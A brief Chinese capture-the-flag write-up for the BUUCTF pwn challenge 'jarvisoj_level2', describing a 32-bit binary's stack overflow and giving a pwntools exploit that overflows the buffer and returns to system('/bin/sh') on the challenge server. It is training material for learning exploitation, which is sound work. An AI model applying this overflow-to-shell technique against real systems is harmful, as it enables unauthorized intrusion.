[BUUCTF-pwn]——jarvisoj_level2
checksec 一下下, 32程序
IDA中看下,发现了system函数还是两个,有可利用的栈溢出read函数,shift+F12,还发现了"/bin/sh"字符串. 所以exploit就如下
exploit
from pwn import *
p = remote("node3.buuoj.cn",28375)
binsh = 0x0804A024
sys_addr = 0x0804845C
payload = 'a' * (0x88 + 0x4) + p32(sys_addr) + p32(binsh)
p.sendlineafter("Input:\n",payload)
p.interactive()